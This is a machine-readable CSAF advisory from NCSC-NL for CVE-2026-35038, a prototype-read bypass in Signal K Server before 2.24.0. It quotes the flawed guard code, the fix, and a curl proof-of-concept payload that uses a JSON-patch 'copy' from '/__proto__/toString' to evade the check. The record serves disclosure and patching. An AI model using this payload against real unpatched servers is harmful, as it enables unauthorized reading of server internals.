{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-35038", "tracking": { "current_release_date": "2026-04-03T15:36:54.444592Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-35038", "initial_release_date": "2026-04-02T17:28:53.359850Z", "revision_history": [ { "date": "2026-04-02T17:28:53.359850Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-04-02T17:28:54.754235Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-04-02T17:39:29.141295Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-04-02T17:39:31.410047Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-04-02T19:39:09.020112Z", "number": "5", "summary": "Unknown change." }, { "date": "2026-04-03T04:39:41.304294Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-04-03T15:30:39.070116Z", "number": "7", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-04-03T15:31:04.965492Z", "number": "8", "summary": "NCSC Score updated." } ], "status": "interim", "version": "8" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.24.0", "product": { "name": "vers:unknown/<2.24.0", "product_id": "CSAFPID-5985033" } } ], "category": "product_name", "name": "signalk-server" } ], "category": "vendor", "name": "SignalK" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-35038", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "notes": [ { "category": "description", "text": "Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0, there is an arbitrary prototype read vulnerability via `from` field bypass. This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should. This issue has been patched in version 2.24.0.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-35038" }, { "category": "description", "text": "Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.24.0, there is an arbitrary prototype read vulnerability via `from` field bypass. This vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should. This issue has been patched in version 2.24.0.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/35xxx/CVE-2026-35038.json" }, { "category": "description", "text": "## Summary \n\nThe /signalk/v1/applicationData/... JSON-patch endpoint allows users to modify stored application data. To prevent Prototype Pollution, the developers implemented an isPrototypePollutionPath guard. However, this guard only checks the path property of incoming JSON-patch objects. It completely fails to check the from property. Because JSON-patch operations like copy and move extract data using the from property path, an attacker can construct a payload where from targets /__proto__/someProperty, completely evading the security check and successfully executing an Arbitrary Prototype Read.\n\nWhile this does not allow arbitrary code execution (as the destination path remains protected from __proto__), it does allow a user to exfiltrate internal Node functions and prototype state into their own application data.\n\n## Vulnerability Root Cause \n\nFile: src/interfaces/applicationData.js (Lines 48-57)\n```\nconst DANGEROUS_PATH_SEGMENTS = ['__proto__', 'constructor', 'prototype']\n\nfunction isPrototypePollutionPath(pathString) {\n const segments = pathString.split(/[./]/)\n return segments.some((seg) => DANGEROUS_PATH_SEGMENTS.includes(seg))\n}\n\nfunction hasPrototypePollutionPatch(patches) {\n return patches.some(\n // [!VULNERABLE] Only checks patch.path, completely ignores patch.from\n (patch) => patch.path && isPrototypePollutionPath(patch.path) \n )\n}\n```\nAt Line 201:\n```\nif (hasPrototypePollutionPatch(req.body)) {\n res.status(400).send('invalid patch path')\n return\n}\njsonpatch.apply(applicationData, req.body) // jsonpatch natively resolves 'from'\n\n```\n## Proof of Concept (PoC)\n\nVerify the Developer Guard Works (The Blocked Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '[{\"op\": \"add\", \"path\": \"/__proto__/polluted\", \"value\": \"hacked\"}]'\n```\nResult: 400 Bad Request - invalid patch path\n\nExecute the Bypass (The Malicious Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '[{\"op\": \"copy\", \"from\": \"/__proto__/toString\", \"path\": \"/stolen\"}]'\n```\nResult: 200 OK - ApplicationData saved The security guard is bypassed and the json-patch engine successfully copies the __proto__ internal function reference.\n\n\"Screenshot\n\n## Security Impact\nThis vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should.\n\n## Fixing Arbitrary Prototype Read\n\nThe hasPrototypePollutionPatch function must be updated to inspect ALL path-related fields:\n```\nfunction hasPrototypePollutionPatch(patches) {\n return patches.some(\n (patch) => \n (patch.path && isPrototypePollutionPath(patch.path)) ||\n (patch.from && isPrototypePollutionPath(patch.from))\n )\n}\n```", "title": "github - https://api.github.com/advisories/GHSA-qh3j-mrg8-f234" }, { "category": "other", "text": "0.00084", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "title": "CVSSV4" }, { "category": "other", "text": "2.1", "title": "CVSSV4 base score" }, { "category": "other", "text": "3.9", "title": "NCSC Score" }, { "category": "other", "text": "The value of the most recent CVSS (V3) score, There is cwe data available from source Nvd, The value of the most recent EPSS score", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5985033" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-35038" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/35xxx/CVE-2026-35038.json" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-qh3j-mrg8-f234" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35038" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-qh3j-mrg8-f234" } ], "title": "CVE-2026-35038" } ] }